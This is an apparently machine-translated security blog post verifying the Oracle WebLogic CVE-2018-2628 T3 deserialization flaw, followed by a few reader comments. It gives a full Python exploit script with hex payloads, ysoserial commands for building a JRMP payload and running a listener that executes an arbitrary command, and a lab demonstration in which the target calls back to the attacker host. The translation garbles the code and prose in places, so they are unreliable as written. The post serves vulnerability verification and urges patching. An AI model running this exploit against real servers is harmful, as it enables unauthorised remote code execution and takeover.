WebLogic cve-2018-2628 Vulnerability Verification

PS: This verification is only for study and research, please do not use illegally. I. Overview of Vulnerabilities

In the early hours of April 18 in Beijing, Oracle officially released the April key patch update CPU (criticalpatchupdate), which contains a high-risk weblogic deserialization Vulnerability (cve-2018-2628), via the vulnerability, An attacker could remotely execute code without authorization. Attackers only need to send carefully constructed T3 protocol data to obtain the permissions of the target server. An attacker can exploit this vulnerability to control components that affect the availability, confidentiality, and integrity of data. ii. Scope of vulnerability impact

Vulnerability impact ranges include:

OracleWebLogicServer10.3.6.0

OracleWebLogicServer12.1.3.0

OracleWebLogicServer12.2.1.2

OracleWebLogicServer12.2.1.3 Three, the status of vulnerability verification

There have been a number of validation codes on GitHub to detect this vulnerability, but the payload fields in most of the code contain a 104.251.228.50 IP address that is attributed to the United States, as follows:

In [2]: payload=[' aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72    ...: 787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c    ...: 6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a617661    ...: 2e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c65720000000000    ...: 0000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e    ...: 03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea9    ..: 0b00000000000000000000000000000078 '] in [3]: Payload[0].decode (' hex ') out[3]: "\xac\xed\x00\x05s}\x00\x00\x00\ X01\x00\x1djava.rmi.activation.activatorxr\x00\x17java.lang.reflect.proxy\xe1 ' \xda \xcc\x10C\xcb\x02\x00\x01L\ X00\x01ht\x00%ljava/lang/reflect/invocationhandler;xpsr\x00-java.rmi.server.remoteobjectinvocationhandler\x00\x00\x00\x00\x00\x00\x00\x02\x02\x00\x00xr\x00\x1cjava.rmi.server.remoteobject\xd3a\xb4\x91\x0ca3\x1e\x03\ x00\x00xpw7\x00\nunicastref\x00\x0e104.251.228.50\x00\x00\x1by\x00\x00\x00\x00\x01\xee\xa9\x0b\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x "

Four, my vulnerability verification

In this respect, I set up the experimental environment to test, and share with you the experience (the entire test involved in the IP address is the experimental environment address) 4.1 Vulnerability Verification Code

First paste my code, only for single-threaded sample code, multithreading please the Great God Himself modify

# coding:utf-8 Import re import i import socket from time import sleep vul=[' cve-2018-2628 '] # requires a custom listener address, currently 11.10 .67.83 payload=[' Aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e5 0726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78 707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c6572000000000000000202000 07872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e696361737452656600

0b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078 '] VER_SIG=[' \ $Proxy [0-9]+ '] def t3handshake (sock, SERVER_ADDR): Sock.connect (SERVER_ADDR) sock.send (' 74332031322e322e310a41533a3235350a484c3 a31390a4d533a31303030303030300a0a '. Decode (' Hex ') sleep (1) sock.recv (1024) sys.stdout.write (' Handshake succ Essful\n ') def BuilDt3requestobject (sock, dport): Data1 = ' 000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b402797372007872017 8720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765 626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696 e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e675061746368 49000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f5374726 96e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d77 65626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e6 96e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f 537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616 c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572 766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044 c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c 65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc 908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261 727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b7 87200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371 ' data2 = ' 007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797 465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900 056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684 c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078 Fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3 139322E3136382E312E323237001257494E2D4147444D565155423154362E656883348CD6000000070000{0} Ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ed E121e2a0c0000787077200114dc42bd07 '. Format (' {: 04x} '. Format (dport)) data3= ' 1a7727000d3234322e323134 ' data4 = ' 2e312e32353461863d1d0000000078 ' for d in [Data1, Data2, Data3, data4]: Sock.send (D.decode (' hex ')) Sleep (2) sys.stdout.write (' Send request payload successful,recv '%

(Len (SOCK.RECV (2048))) def sendevilobjdata (sock, data): Payload= ' 056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f6769637572047 8700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c617373 5461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d77656 26c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a656374 3b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792 F52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a61766 12f6c616e672f4f626a6563743b78707702000078fe010000 ' Payload+=data payload+= ' fe010000aced0005737200257765626c6f676 9632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e7072 6f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e6 96e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f 6769632E73656375726974792E61636C2E55736572496E666F3B290000001B7878FE00FF ' payload = '%s%s '% (' {: 08x} '. Format (Len ( Payload)/2 + 4), payload) sock.send (payload.decode (' hex ')) Sleep (2) sock.send (Payload.decode (' hex ')) r Es = ' Try:while true:res + + + SOCK.RECV (4096) sleep (0.1) except Exception S E:pass returnRes def checkvul (res, SERVER_ADDR, index): P=re.findall (Ver_sig[index), Res, re. S) If Len (p) >0:return ' [+] {}:{} is vul {} '. Format (server_addr[0], server_addr[1], Vul[index] Else  : Return ' [-] {}:{} are not vul {} '. Format (server_addr[0], server_addr[1], Vul[index]) def run (*args): Dip = Args[0] Dport = args[1] sock = Socket.socket (socket.af_inet, socket. SOCK_STREAM) # After patching, will block, so set timeout time, the default 15s, according to the situation of their own adjustment sock.settimeout server_addr = (Dip, dport) T3han Dshake (sock, Server_addr) buildt3requestobject (sock, Dport) rs=sendevilobjdata (sock, Payload[index]) print

Checkvul (RS, server_addr, index) def single (): Dip = sys.argv[1] Dport = Int (sys.argv[2)) run (Dip, Dport)
 if __name__ = = ' __main__ ': index = 0 single ()

4.2 Payload Field Modifications

For how to modify the address in the payload field in your code, you can use ysoserial to obtain the command:

$ java-jar Ysoserial-master.jar jrmpclient 11.10.67.83:1099 |  Xxd 00000000:aced 0005 737d 0000 0001 001a 6a61 7661 ... s}......java 00000010:2e72 6d69 2e72 6567 6973 7472 792e 5265 . rmi.registry.Re 00000020:6769 7374 7279 7872 0017 6a61 7661 2e6c gistryxr. JAVA.L 00000030:616e 672e 7265 666c 6563 742e 5072 6f78 ang.reflect.Prox 00000040:79e1 27da 20cc 1043 cb02 0001 4c00 01 Y. '. .. C.... L.. H 00000050:7400 254c 6a61 7661 2f6c 616e 672f 7265 t.%ljava/lang/re 00000060:666c 6563 742f 496e 766f 6361 7469 6f6e F Lect/invocation 00000070:4861 6e64 6c65 723b 7870 7372 002d 6a61 handler;xpsr.-ja 00000080:7661 2e72 6d69 2e73 6572 766  5 722e 5265 va.rmi.server.Re 00000090:6d6f 7465 4f62 6a65 6374 496e 766f 6361 moteobjectinvoca 000000a0:7469 6f6e 4861
6e64 6c65 7200 0000 0000 Tionhandler ..... 000000b0:0000 0202 0000 7872 001c 6a61 7661 2e72 ... xr. JAVA.R 000000c0:6d69 2e73 6572 7665 722e 5265 6d6f 7465 mi.server.Remote 000000d0:4f62 6a65 6374 d361 b491 0c61 331e 03 00  Object.a...a3 ... 000000e0:0078 7077 3400 0a55 6e69 6361 7374 5265. Xpw4. Unicastre 000000f0:6600 0b31 312e 3130 2e36 372e 3833 0000 F. 11.10.67.83.00000100:044b ffff ffff c56f 9b74 0000 0000 0000.
K.....O.T ...
 00000110:0000 0000 0000 0000 0078 ... x

Note that ysoserial need to rely on the JDK to run the above command to get their own payload (here is

Aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e5 0726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78 707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c6572000000000000000202000 07872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e696361737452656600 0b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078

To replace the payload content in your code. 4.3 Vulnerability Verification

Set the Jrmplistener host through the ysoserial and enter the outgoing command to be returned, as follows:

JAVA-CP Ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "command"

After running the above command, the experiment can be carried out formally. To verify the effect of this vulnerability remote code execution, for example, to install WebLogic Linux Server, you can perform a Curl command test to access our own built Web server and view the Web log, if the IP address of the target machine is in the log, and indicates that this vulnerability has been successfully exploited. Finally, the vulnerability verification effect is posted. The test of the attack aircraft for 11.10.67.83 (Lab private IP), Rmplistener and Web services are enabled on this server

Target drone for 11.10.138.61 (Lab private IP)

Execute the following command on the attacker to attack the drone 11.10.138.61

Python test.py 11.10.138.61 7001

Display on the 11.10.67.83 of the attack aircraft

You can see the results in the 11.10.67.83 Web log

You can see that exploiting this vulnerability allowed the target drone 11.10.138.61 to access the Web service of the attack aircraft 11.10.67.83. v. Conclusion

As you can see from the above experiments, this vulnerability does have the ability to execute remote code, and security and operation personnel are alert to fix this vulnerability as soon as possible. For this vulnerability, Oracle has already given the appropriate patches, and strongly recommends that the affected users upgrade the update for protection as soon as possible.

The above validation is only for study and research, please do not use illegally.

* Author: kaixin3000, reproduced please indicate from freebuf.com kaixin3000 1 Article grade: 1 | Previous: The enterprise did not repair the Apache Struts 2 vulnerability to Web servers were batch intrusion next: Digging Experience | See how I can bypass a strong XSS filter on a managed company domain Comment has 3 comments dead curtilage 10086 (7) 2018-05-02 reply 1 floor

666 lit up (0) dictionary czd (level 1) 2018-05-02 back to 2 floor

Bright (0) night to do the morning (6) The future Miao to leave me alone, the return of the Hundred War back to reading 2018-05-02 back to the 3 floor

Light Up (1)